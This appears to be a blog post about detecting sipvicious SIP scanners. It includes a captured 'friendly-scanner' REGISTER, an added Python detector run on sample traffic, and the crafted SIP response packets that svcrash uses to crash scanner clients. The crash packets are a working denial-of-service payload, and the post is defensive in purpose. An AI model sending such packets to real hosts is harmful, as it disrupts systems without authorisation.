Occasionally we find one of our SIP servers being probed/attacked by some joker running sipvicious. If you're watching traffic on your machine and see a flood of packets that look like this:
    REGISTER sip:email@example.com SIP/2.0
    Via: SIP/2.0/UDP 188.8.131.52:5337;branch=z9hG4bK-290698590;rport
    Content-Length: 0
    From: "5233"<sip:firstname.lastname@example.org>; tag=353233330132343732353834313430
    Accept: application/sdp
    User-Agent: friendly-scanner
    To: "5233"<sip:email@example.com>
    Contact: sip:firstname.lastname@example.org
    CSeq: 1 REGISTER
    Call-ID: 1477783886
    Max-Forwards: 70
then you're getting attacked too. There are some other flavors of sipvicious floating around out there as well that identify themselves in various ways, but "friendly-scanner" is the default.
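As an added example (not code from the original post or from sipvicious itself), here is a small Python detector that parses captured SIP REGISTER messages, flags any source whose User-Agent is the default friendly-scanner string, and also flags any source that sends an unusual number of REGISTERs, which is what catches the renamed flavors that a user-agent check alone misses. The SIP messages, the "renamed-scanner" and "desk-phone/1.0" user agents and the 192.0.2.x addresses are constructed sample data, and the threshold of three REGISTERs is an arbitrary illustration.

```python
"""Spot sipvicious-style REGISTER scans in captured SIP messages.

Added example, not code from the original post or from sipvicious.  The
messages below are constructed samples modelled on the REGISTER shown above.
"""
from collections import Counter

# Default identification string used by sipvicious; renamed variants exist.
SCANNER_USER_AGENTS = ("friendly-scanner",)


def parse_sip(raw: str) -> dict:
    """Split a SIP message into its start line and a dict of lower-cased headers.

    Only the long header form is handled (no "v:" for "Via:"); headers end at
    the first blank line.
    """
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the headers; any body follows
        name, _, value = line.partition(":")  # first colon only, so "sip:" stays in the value
        headers[name.strip().lower()] = value.strip()
    return {"start_line": lines[0], "headers": headers}


def via_host(headers: dict) -> str:
    """Return the sent-by host from the topmost Via header (IPv4 literal or hostname).

    Over UDP this value is under the sender's control; in production key on the
    socket's source address instead and use Via only as corroboration.
    """
    via = headers.get("via", "")
    parts = via.split(";", 1)[0].split(None, 1)  # "SIP/2.0/UDP host:port" -> host:port
    return parts[1].split(":")[0] if len(parts) == 2 else ""


def is_scanner(msg: dict) -> bool:
    """True when the User-Agent matches a known scanner string."""
    ua = msg["headers"].get("user-agent", "").lower()
    return any(s in ua for s in SCANNER_USER_AGENTS)


def scan_report(messages, threshold: int = 3) -> dict:
    """Count REGISTERs per Via host and flag scanner user agents or bursty hosts."""
    register_counts = Counter()
    scanner_hosts = set()
    for raw in messages:
        msg = parse_sip(raw)
        if not msg["start_line"].startswith("REGISTER "):
            continue  # only registration attempts are counted here
        host = via_host(msg["headers"])
        register_counts[host] += 1
        if is_scanner(msg):
            scanner_hosts.add(host)
    bursty = {h for h, n in register_counts.items() if n >= threshold}
    return {
        "register_counts": dict(register_counts),
        "scanner_hosts": scanner_hosts,
        "flagged": scanner_hosts | bursty,
    }


def make_register(src: str, user: str, user_agent: str, seq: int) -> str:
    """Build a minimal REGISTER shaped like the one on the page (constructed test data)."""
    return (
        "REGISTER sip:example.com SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {src};branch=z9hG4bK-{seq};rport\r\n"
        "Content-Length: 0\r\n"
        f'From: "{user}"<sip:{user}@example.com>;tag=abc{seq}\r\n'
        f"User-Agent: {user_agent}\r\n"
        f'To: "{user}"<sip:{user}@example.com>\r\n'
        f"Contact: sip:{user}@{src}\r\n"
        f"CSeq: {seq} REGISTER\r\n"
        f"Call-ID: {1000 + seq}\r\n"
        "Max-Forwards: 70\r\n\r\n"
    )


# Constructed sample traffic: the default scanner, a renamed scanner that only the
# rate check catches, one ordinary phone, and a non-REGISTER request that is ignored.
SAMPLE_MESSAGES = (
    [make_register("188.8.131.52:5337", "5233", "friendly-scanner", i) for i in (1, 2)]
    + [make_register("192.0.2.9:5060", str(200 + i), "renamed-scanner", i) for i in range(1, 5)]
    + [make_register("192.0.2.33:5060", "alice", "desk-phone/1.0", 1)]
    + ["OPTIONS sip:example.com SIP/2.0\r\nVia: SIP/2.0/UDP 192.0.2.9:5060;branch=z9hG4bK-9\r\n"
       "User-Agent: renamed-scanner\r\nContent-Length: 0\r\n\r\n"]
)

if __name__ == "__main__":
    report = scan_report(SAMPLE_MESSAGES)
    for host in sorted(report["flagged"]):
        why = "scanner UA" if host in report["scanner_hosts"] else "REGISTER burst"
        print(f"{host}: {report['register_counts'][host]} REGISTERs ({why})")
```

Run as-is it lists both flagged hosts; the ordinary phone with a single REGISTER stays quiet. The Via sent-by address is used here because it is what the captured packet shows, but over UDP it is whatever the sender chose to write, so a real deployment should count per socket source address and treat Via as a secondary signal.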
The most recent releases of sipvicious, since about mid 2010, have included a tool called svcrash.py. It lets you crash a remotely running sipvicious client by sending it a specially crafted SIP response, assuming the remote client is a current release that nobody has patched. The mechanism it uses is EXTREMELY simplistic, so anybody with any coding talent could patch it in a matter of minutes, but it's not so simplistic that you could find it with grep. The author acknowledges the weakness of svcrash as well, but provides it as a courtesy to stop the script kiddies. Anyway, here's the special response packet that will crash one of these friendly scanners:
    SIP/2.0 200 OK
    Via: SIP/2.0/UDP 184.108.40.206:5061;branch=z9hG4bK-573841574;rport
    Content-length: 0
    From: "100"<sip:100@localhost>; tag=683a653a7901746865726501627965
    User-agent: Telkom Box 2.4
    To: "100"<sip:100@localhost>
    Cseq: 1 REGISTER
    Call-id: 469585712
    Max-forwards: 70
Now it's not completely obvious from looking at this packet what causes the crash, but here's a hint: this packet would crash it too:
    SIP/2.0 200 OK
    Via: SIP/2.0/UDP 192.168.0.1:5060;received=220.127.116.11;rport=5060;branch=z9hG4bK214549178
    From: <sip:email@example.com>;tag=796f7501676f74016974
    To: <sip:firstname.lastname@example.org>;tag=75d09fb22ceadb40012c6e771a69dc74.0d5d
    Call-ID: 1973675384
    CSeq: 214 REGISTER
    Contact: <sip:email@example.com>;expires=239;received="sip:18.104.22.168:5060"
    Server: OpenSIPS
    Content-Length: 0
Let's see if you can figure out what the trick is.